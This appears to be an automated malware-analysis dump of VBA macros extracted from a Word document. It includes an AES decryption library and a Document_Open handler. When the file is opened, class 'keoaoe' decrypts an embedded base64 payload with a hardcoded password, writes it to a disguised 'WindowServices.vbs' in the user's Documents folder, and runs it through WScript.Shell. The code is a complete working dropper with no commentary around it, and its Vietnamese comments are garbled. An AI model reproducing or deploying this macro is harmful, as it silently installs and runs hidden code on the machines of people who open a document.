      Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
      Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
      Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
      '--- bcrypt
      Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
      Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
      Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
      Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
      #End If
      #If Not ImplUseShared Then
          #If HasPtrSafe Then
          Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
          Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
          Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
          Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
          Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
          #Else
          Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
          Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
          Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
          Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
          Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
          #End If
      #End If
      
      '=========================================================================
      ' Constants and member variables
      '=========================================================================
      
      Private Const AES_BLOCK_SIZE        As Long = 16
      Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
      Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
      Private Const KDF_SALTLEN           As Long = 8
      Private Const KDF_ITER              As Long = 10000
      Private Const KDF_HASH              As String = "SHA512"
      Private Const HMAC_HASH             As String = "SHA256"
      Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
      Private Const OPENSSL_MAGICLEN      As Long = 8
      Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
      Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"
      
      Private Type UcsCryptoContextType
          hPbkdf2Alg          As LongPtr
          hHmacAlg            As LongPtr
          hHmacHash           As LongPtr
          HashLen             As Long
          hAesAlg             As LongPtr
          hAesKey             As LongPtr
          AesKeyObjData()     As Byte
          AesKeyObjLen        As Long
          Nonce(0 To 3)       As Long
          EncrData()          As Byte
          EncrPos             As Long
          LastError           As String
      End Type
      
      Private m_uChunkedCtx           As UcsCryptoContextType
      
      '=========================================================================
      ' Functions
      '=========================================================================
      
      '--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
      Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
          Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
          Dim baData()        As Byte
          Dim baPass()        As Byte
          Dim baSalt()        As Byte
          Dim baKey()         As Byte
          Dim sError          As String
          
          baData = ToUtf8Array(sText)
          baPass = vbNullString
          baSalt = vbNullString
          If Not IsArray(Password) Then
              If Not IsMissing(Password) Then
                  baPass = ToUtf8Array(Password & vbNullString)
              End If
              ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
              Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
          Else
              baKey = Password
          End If
          If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
              Err.Raise vbObjectError, , sError
          End If
          If Not IsArray(Password) Then
              ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
              If UBound(baData) >= PREFIXLEN Then
                  Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
              End If
              Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
              Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
          End If
          AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
      End Function
      
      '--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
      Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
          Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
          Dim baData()        As Byte
          Dim baPass()        As Byte
          Dim baSalt()        As Byte
          Dim baKey()         As Byte
          Dim sMagic          As String
          Dim sError          As String
          
          baData = FromBase64Array(sEncr)
          baPass = vbNullString
          baSalt = vbNullString
          If Not IsArray(Password) Then
              If Not IsMissing(Password) Then
                  baPass = ToUtf8Array(Password & vbNullString)
              End If
              If UBound(baData) >= PREFIXLEN - 1 Then
                  sMagic = String$(OPENSSL_MAGICLEN, 0)
                  Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
                  If sMagic = OPENSSL_MAGIC Then
                      ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                      Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                      If UBound(baData) >= PREFIXLEN Then
                          Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                          ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                      Else
                          baData = vbNullString
                      End If
                  End If
              End If
          Else
              baKey = Password
          End If
          If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
              Err.Raise vbObjectError, , sError
          End If
          AesDecryptString = FromUtf8Array(baData)
      End Function
      
      Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
          Const VT_BYREF      As Long = &H4000
          Dim uCtx            As UcsCryptoContextType
          Dim vErr            As Variant
          Dim bHashBefore     As Boolean
          Dim bHashAfter      As Boolean
          Dim baPass()        As Byte
          Dim baSalt()        As Byte
          Dim baKey()         As Byte
          Dim baTemp()        As Byte
          Dim lPtr            As LongPtr
          
          On Error GoTo EH
          If IsArray(Hmac) Then
              bHashBefore = (Hmac(0) <= 0)
              bHashAfter = (Hmac(0) > 0)
          End If
          If IsMissing(Password) Then
              baPass = vbNullString
          ElseIf IsArray(Password) Then
              baPass = Password
          Else
              baPass = ToUtf8Array(Password & vbNullString)
          End If
          If IsMissing(Salt) Then
              baSalt = baPass
          ElseIf IsArray(Salt) Then
              baSalt = Salt
          Else
              baSalt = ToUtf8Array(Salt & vbNullString)
          End If
          If IsArray(key) Then
              baKey = key
          End If
          If KeyLen <= 0 Then
              KeyLen = AES_KEYLEN
          End If
          If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
              Error = uCtx.LastError
              GoTo QH
          End If
          If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
              Error = uCtx.LastError
              GoTo QH
          End If
          If IsArray(Hmac) Then
              baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
              #If Win64 Then
                  lPtr = PeekPtr(VarPtr(Hmac) + 8)
              #Else
                  lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
              #End If
              If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
                  lPtr = PeekPtr(lPtr)
              End If
              #If Win64 Then
                  lPtr = PeekPtr(lPtr + 16)
              #Else
                  lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
              #End If
              Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
          End If
          '--- success
          AesCryptArray = True
      QH:
          pvCryptoAesCtrTerminate uCtx
          Exit Function
      EH:
          vErr = Array(Err.Number, Err.Source, Err.Description)
          pvCryptoAesCtrTerminate uCtx
          Err.Raise vErr(0), vErr(1), vErr(2)
      End Function
      
      Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
          Dim baEmpty()       As Byte
          Dim baKey()         As Byte
          
          pvCryptoAesCtrTerminate m_uChunkedCtx
          baEmpty = vbNullString
          If IsArray(key) Then
              baKey = key
          End If
          If KeyLen <= 0 Then
              KeyLen = AES_KEYLEN
          End If
          AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
      End Function
      
      Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
          If m_uChunkedCtx.hAesAlg = 0 Then
              m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
              Exit Function
          End If
          baOutput = baInput
          AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
          If Final Then
              pvCryptoAesCtrTerminate m_uChunkedCtx
          End If
      End Function
      
      Public Function AesChunkedGetLastError() As String
          AesChunkedGetLastError = m_uChunkedCtx.LastError
      End Function
      
      '= private ===============================================================
      
      Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
          Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
          Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
          Dim hResult         As Long
          
          With uCtx
              '--- init member vars
              .EncrData = vbNullString
              .EncrPos = 0
              .LastError = vbNullString
              ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
              If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
                  '--- generate RFC 2898 based derived key
                  On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
                  hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  On Error GoTo 0
              End If
              '--- init AES key from first half of derived key
              On Error GoTo EH_Unsupported '--- CNG API missing on XP
              hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
              If hResult < 0 Then
                  GoTo QH
              End If
              On Error GoTo 0
              hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
              If hResult < 0 Then
                  GoTo QH
              End If
              hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
              If hResult < 0 Then
                  GoTo QH
              End If
              ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
              hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
              If hResult < 0 Then
                  GoTo QH
              End If
              '--- init AES IV from second half of derived key
              Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
              '--- init HMAC key from last HashLen bytes of derived key
              hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
              If hResult < 0 Then
                  GoTo QH
              End If
              hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
              If hResult < 0 Then
                  GoTo QH
              End If
              hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
              If hResult < 0 Then
                  GoTo QH
              End If
          End With
          '--- success
          pvCryptoAesCtrInit = True
          Exit Function
      QH:
          uCtx.LastError = GetSystemMessage(hResult)
          Exit Function
      EH_Unsupported:
          uCtx.LastError = ERR_UNSUPPORTED_ENCR
      End Function
      
      Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
          With uCtx
              If .hPbkdf2Alg <> 0 Then
                  Call BCryptCloseAlgorithmProvider(.

      General
      Stream Path:Macros/VBA/ThisDocument
      VBA File Name:ThisDocument.cls
      Stream Size:1565
      Data ASCII:. . . . . . . . . . . . . . . . . . . 9 . . . G . . . + . . . . . . . . . . . A . V . . . . . . . . . . . . . . . . . . . p . . . c ; . L C n . . ( . [ M h . . . . . . . . . . . . . . . . . . . . . . } ^ V H ( . e . . . . . . . . . . . . . . . . . . . . . . . . x . . . . } ^ V H ( . e . . c ; . L C n . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . P . . . . . S " . . . . S . . . . . S " . . . . " 2 . . . . . 6 " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . . . . . ( . 1 . N . o .
      Data Raw:01 16 03 00 04 00 01 00 00 e4 03 00 00 e4 00 00 00 12 02 00 00 39 04 00 00 47 04 00 00 2b 05 00 00 01 00 00 00 01 00 00 00 96 41 07 56 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 9d 63 b7 3b c7 dc 87 4c 94 be 43 f7 8b 6e e2 08 18 85 28 c9 9b f5 5b 4d 82 68 e2 e4 98 18 00 97 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "ThisDocument"
      Attribute VB_Base = "1Normal.ThisDocument"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = True
      Attribute VB_Customizable = True
      Private Sub Document_Open()
          Dim keooo As New keoaoe
          keooo.TestAES
          
      End Sub
      
      
      
      

      General
      Stream Path:Macros/VBA/ThisDocument1
      VBA File Name:ThisDocument1.cls
      Stream Size:1107
      Data ASCII:. . . . . . . . 2 . . . . . . . . . . 9 . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S . . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . F . C . F . B . 3 . D . 2 . A . - .
      Data Raw:01 16 03 00 01 f0 00 00 00 32 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 03 00 00 8d 03 00 00 00 00 00 00 01 00 00 00 96 41 8f b6 00 00 ff ff 03 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "ThisDocument1"
      Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = False
      

      General
      Stream Path:Macros/VBA/keoaoe
      VBA File Name:keoaoe.cls
      Stream Size:11693
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . p . . . . . y L . u W . X * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . W . Q E . . A . . . . . . . . . . . . . . . . . . . . . . . x . . . . W . Q E . . A . . . y L . u W . X . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S . . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . F . C . F . B . 3 . D . 2 . A . - . A . 0 . F . A . - . 1 . 0 .
      Data Raw:01 16 03 00 02 00 01 00 00 b2 04 00 00 e4 00 00 00 10 02 00 00 e0 04 00 00 ee 04 00 00 fa 19 00 00 00 00 00 00 01 00 00 00 96 41 0b 1d 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 cc a7 e3 c4 be 79 a3 4c b3 ae 00 75 57 cd a0 58 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "keoaoe"
      Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = False
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = False
      Public Sub TestAES()
          Dim key As String
          Dim decryptedText As String
          Dim i As Integer
          Dim parts(1 To 60) As String
          Dim allDecryptedText As String
          Dim chunkSize As Integer
          Dim tempFilePath As String
      
          ' ?t kha AES
          key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
          part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
          part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
          part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
          part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
          part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
          part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
          part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
          part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
          part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
          part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
          part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
          part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
          part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
          part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
          part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
          part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
          part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
          part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
          part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
          part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
          part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
          part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
          part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
          part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
          Dim encryptedText As String
          encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
          decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m
      
          ' Kch thu?c c?a m?i ph?n
          chunkSize = 3000  ' Kch thu?c m?i ph?n
          Dim outputFilePath As String
          ' Luu ton b? n?i dung gi?i m vo t?p VBS
          vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
      
          ' Ghi t?ng ph?n ra t?p
          Open vbsFilePath For Output As #1
          For i = 1 To Len(decryptedText) Step chunkSize
              partText = Mid(decryptedText, i, chunkSize)
              Print #1, partText  ' Ghi t?ng ph?n vo t?p
          Next i
          Close #1
      
          Dim shell As Object
          Set shell = CreateObject("WScript.Shell")
          shell.Run """" & vbsFilePath & """", 1, True
      
      
      End Sub
      
      
      
      

      General
      Stream Path:\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.235956365095031
      Base64 Encoded:True
